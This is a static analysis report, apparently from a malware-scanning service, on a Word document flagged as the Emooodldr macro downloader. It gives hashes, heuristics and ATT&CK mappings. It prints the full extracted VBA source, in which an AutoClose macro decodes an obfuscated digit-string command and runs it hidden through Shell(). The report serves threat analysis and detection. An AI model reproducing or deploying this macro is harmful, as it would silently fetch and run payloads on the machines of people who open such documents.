Emooodldr — Office (OOXML) malware analysis

Static analysis result for SHA-256 f703df08f5e7388f…

MALICIOUS

Office (OOXML)

Size: 33.1 KB
Created: 2017-10-25 18:34:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2019-05-16
MD5: 7d3b215f3fa77a0e6bb20612aecbacfa
SHA-1: 771c75a24462f8eca232d23456b297b1dbce1f79
SHA-256: f703df08f5e7388f4873137977cf1c96a24293a7bf93b952c586c27b34e4212e
Risk Score: 244

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1203 Exploitation for Client Execution

The sample is identified as malicious by ClamAV with the signature Doc.Malware.Emooodldr-6711604-0. It contains VBA macros, including an AutoClose macro (Word's run-on-close auto macro, flagged by the Auto_Close heuristic) that calls Shell() to execute a payload. The command is not stored in clear text: AutoClose passes a long digit string to estonia(), which reads it two digits at a time and maps each pair through the character table in riciclato(); the decoded string (likely a command or URL) is then handed to Shell() with window style 0 (hidden). The combination of Shell() and this obfuscated command string indicates an attempt to download and run a second-stage payload.

Heuristics (6)

  • ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2273 bytes
SHA-256: 8b2d1d1c707186efeaa5b5dc57db1fc64fb20ffc3fa03d08ff31cefb77f1f1ac
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function riciclato(piattino As Integer) As String
 Dim peccato() As Variant
 peccato = Array("k", "d", ".", "A", "C", "a", "l", "W", "t", "o", "j", "S", ")", "/", "h", "p", "\", "y", "g", "v", "r", "J", ":", "f", "P", "i", "m", "=", "O", "-", "B", "w", "c", "s", ",", "N", " ", "E", "F", "?", "Q", "D", "n", "+", "'", "T", "b", "$", "(", ";", "x", "e")
 Dim satellite As Integer
 
 For satellite = LBound(peccato) To UBound(peccato)
   If satellite = piattino Then
    riciclato = peccato(satellite)
   End If
 Next
 
End Function

Function uncinetto(brodo As String)
    brodo = StrConv(brodo, vbUnicode)
    uncinetto = Split(Left(brodo, Len(brodo) - 1), vbNullChar)
End Function

Function estonia(ampliare As String) As String
  Dim inter As Integer
  Dim passivo As String
  Dim eclissi As Variant
  eclissi = uncinetto(Trim(ampliare))
  For satellite = 0 To Len(ampliare)
  
    If (satellite + 1) <= UBound(eclissi) Then
    Dim ambrato As String
    ambrato = eclissi(satellite)
    satellite = satellite + 1
    ambrato = ambrato + eclissi(satellite)
    
    passivo = passivo + riciclato(Int(ambrato))
    End If
  Next
  
  estonia = passivo
End Function

Public Function tentacolo(satellite As String)
  Shell satellite, 0
End Function

Sub AutoClose()
 Call Application.Run("tentacolo", estonia("32260102515051361332361509315120331451060636293750513236301715053333362935092436290409262605420136483551312928461051320836111733085126023551080207514604062551420812024109314206090501382506514844140808152213130900105125420826090809203317023209261342254209132605202509180226012344343647514219220324244103450336433644164017083803210251505144124936110805200829242009325133333647514219220324244103450344164017083803210251505144493648355131292846105132083611173308512602355108020751460406255142081202410931420609050111082025421848441408081522131309001051254208260908092033170232092613330215141539250127260520250918441249"))
End Sub
Filename | Kind | Source | Size
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes
SHA-256: 6864495207ef77277ea89eb561a4719fc8503fe39dbc3e51703fc9dce91eb3fc
Detection
ClamAV: Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).